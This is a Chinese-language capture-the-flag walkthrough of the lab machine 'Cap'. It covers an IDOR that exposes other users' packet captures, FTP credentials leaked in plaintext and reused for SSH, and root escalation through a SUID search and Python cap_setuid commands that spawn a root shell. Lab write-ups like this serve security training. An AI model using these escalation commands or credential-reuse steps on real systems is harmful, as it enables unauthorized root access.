Cap#
ip:10.10.10.245
Cap 是一台简单难度的运行 HTTP 服务器的 Linux 机器,该服务器执行包括执行网络捕获在内的管理功能。不当的控制导致不安全的直接对象引用(IDOR),从而获得对另一用户捕获的访问权限。该捕获包含明文凭证,可用于获得立足点。随后利用 Linux 功能提升至 root 权限。
task1
有多少 TCP 端口是开放的?
3
task2
运行 “Security Snapshot” 后,浏览器将重定向到格式为/[something]/[id]
的路径,其中[id]
代表扫描的 ID 号。[something]
是什么?
task3 你能查看其他用户的扫描结果吗?
通过更改 data 后面的数字 id,可以查看其他用户的扫描结果
task4 PCAP 文件包含敏感数据的 ID 是什么?
id 指的是 data 的编号,在 0 号 pcap 文件中有 ftp 登录的账号信息
task5 在 pcap 文件中,敏感数据会出现在哪个应用层协议里?
ftp
task6 我们拿到了 Nathan 的 FTP 密码。这个密码还能用在其他什么服务上?
ssh
task 7 提交位于 nathan 用户主目录中的 flag
ssh nathan@10.10.10.245
登录后即可看到 flag
task8 提交 root 目录下的 flag
查看 suid 位设置
find / -perm -u=s -type f 2>/dev/null
提权脚本
https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS
上传至靶机 10.10.10.245
python
参考:https://gtfobins.github.io/gtfobins/python/
cp $(which python) .
sudo setcap cap_setuid+ep python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/python3.8
import os
os.setuid(0)
os.system("/bin/bash")